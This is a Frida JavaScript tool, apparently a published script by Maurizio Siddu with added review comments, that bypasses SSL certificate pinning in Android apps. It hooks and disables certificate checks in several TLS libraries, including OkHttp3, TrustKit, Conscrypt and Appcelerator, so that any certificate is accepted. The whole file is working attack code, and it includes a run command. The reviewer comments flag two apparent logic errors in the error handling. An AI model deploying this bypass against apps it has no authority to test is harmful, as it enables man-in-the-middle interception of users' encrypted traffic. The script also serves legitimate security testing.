Another Android ssl certificate pinning bypass for various methods
/* Android ssl certificate pinning bypass for various methods
by Maurizio Siddu
Run with:
frida -U -f [APP_ID] -l frida_multiple_unpinning.js --no-pause
*/
// Frida agent body. Setup is deferred through a zero-delay timer and runs inside
// Java.perform. It replaces the certificate-validation / pinning entry points of
// several Android TLS stacks with implementations that accept any certificate.
// Each library gets its own try/catch and logs '[+] Setup ...' or '[-] ... not found'.
// Review takeaway: every check replaced below executes inside the app's own
// process, so certificate pinning cannot be the only control protecting an API;
// the server still has to authenticate and authorize each request itself.
setTimeout(function() {
Java.perform(function () {
console.log('')
console.log('======')
console.log('[#] Android Bypass for various Certificate Pinning methods [#]')
console.log('======')
var X509TrustManager = Java.use('javax.net.ssl.X509TrustManager');
var SSLContext = Java.use('javax.net.ssl.SSLContext');
// TrustManager (Android < 7)
var TrustManager = Java.registerClass({
// Implement a custom TrustManager
// Registered under this class name; it implements X509TrustManager.
name: 'com.sensepost.test.TrustManager',
implements: [X509TrustManager],
methods: {
// Empty bodies: neither check ever throws, so no chain is ever rejected.
checkClientTrusted: function (chain, authType) {},
checkServerTrusted: function (chain, authType) {},
// Reports an empty list of accepted issuers.
getAcceptedIssuers: function () {return []; }
}
});
// Prepare the TrustManager array to pass to SSLContext.init()
var TrustManagers = [TrustManager.$new()];
// Get a handle on the init() on the SSLContext class
// NOTE(review): this overload lookup sits outside the try below, so a failure
// here would presumably not reach the '[-] ... not found' branch - confirm.
var SSLContext_init = SSLContext.init.overload(
'[Ljavax.net.ssl.KeyManager;', '[Ljavax.net.ssl.TrustManager;', 'java.security.SecureRandom');
try {
// Override the init method, specifying the custom TrustManager
// The caller's trustManager argument is discarded; keyManager and secureRandom
// are passed through unchanged.
SSLContext_init.implementation = function(keyManager, trustManager, secureRandom) {
console.log('[+] Intercepted Trustmanager (Android < 7) request');
SSLContext_init.call(this, keyManager, TrustManagers, secureRandom);
};
console.log('[+] Setup custom TrustManager (Android < 7)');
} catch (err) {
console.log("[-] TrustManager (Android < 7) pinner not found");
}
// okhttp3
try {
var CertificatePinner = Java.use('okhttp3.CertificatePinner');
// check(String, List) is replaced by a function that logs its first argument
// and returns normally; OkHttp signals a pin mismatch by throwing, so a plain
// return means no pin is ever enforced.
CertificatePinner.check.overload('java.lang.String', 'java.util.List').implementation = function (str) {
console.log('[+] Intercepted OkHTTP3: ' + str);
return;
};
console.log('[+] Setup OkHTTP3 pinning')
} catch(err) {
// If we dont have a ClassNotFoundException exception, raise the issue encountered
// NOTE(review): the test below is true only when the message STARTS with
// 'ClassNotFoundException', which is the opposite of what the comment above
// describes - confirm which behaviour was intended.
if (err.message.indexOf('ClassNotFoundException') === 0) {
throw new Error(err);
}
console.log('[-] OkHTTP3 pinner not found')
}
// Trustkit
try {
// Despite the variable name, this is TrustKit's OkHostnameVerifier class.
var Activity = Java.use("com.datatheorem.android.trustkit.pinning.OkHostnameVerifier");
// Both verify() overloads are replaced to log the first argument and return true.
Activity.verify.overload('java.lang.String', 'javax.net.ssl.SSLSession').implementation = function (str) {
console.log('[+] Intercepted Trustkit{1}: ' + str);
return true;
};
Activity.verify.overload('java.lang.String', 'java.security.cert.X509Certificate').implementation = function (str) {
console.log('[+] Intercepted Trustkit{2}: ' + str);
return true;
};
console.log('[+] Setup Trustkit pinning')
} catch(err) {
console.log('[-] Trustkit pinner not found')
}
// TrustManagerImpl (Android > 7)
try {
var TrustManagerImpl = Java.use('com.android.org.conscrypt.TrustManagerImpl');
// verifyChain is replaced to hand back the untrusted chain it was given,
// unchanged, without any validation being performed on it.
TrustManagerImpl.verifyChain.implementation = function (untrustedChain, trustAnchorChain, host, clientAuth, ocspData, tlsSctData) {
console.log('[+] Intercepted TrustManagerImpl (Android > 7): ' + host);
return untrustedChain;
}
console.log('[+] Setup TrustManagerImpl (Android > 7) pinning')
} catch (err) {
console.log('[-] TrustManagerImpl (Android > 7) pinner not found')
}
// Appcelerator
try {
var PinningTrustManager = Java.use('appcelerator.https.PinningTrustManager');
// checkServerTrusted is replaced by a function that only logs and never throws.
PinningTrustManager.checkServerTrusted.implementation = function () {
console.log('[+] Intercepted Appcelerator');
}
console.log('[+] Setup Appcelerator pinning')
} catch (err) {
console.log('[-] Appcelerator pinner not found')
}
// OpenSSLSocketImpl
try {
var OpenSSLSocketImpl = Java.use('com.android.org.conscrypt.OpenSSLSocketImpl');
// verifyCertificateChain is replaced by a function that only logs; both
// arguments are ignored.
OpenSSLSocketImpl.verifyCertificateChain.implementation = function (certRefs, authMethod) {
console.log('[+] Intercepted OpenSSLSocketImpl');
}
console.log('[+] Setup OpenSSLSocketImpl pinning')
} catch (err) {
console.log('[-] OpenSSLSocketImpl pinner not found');
}
});
}, 0);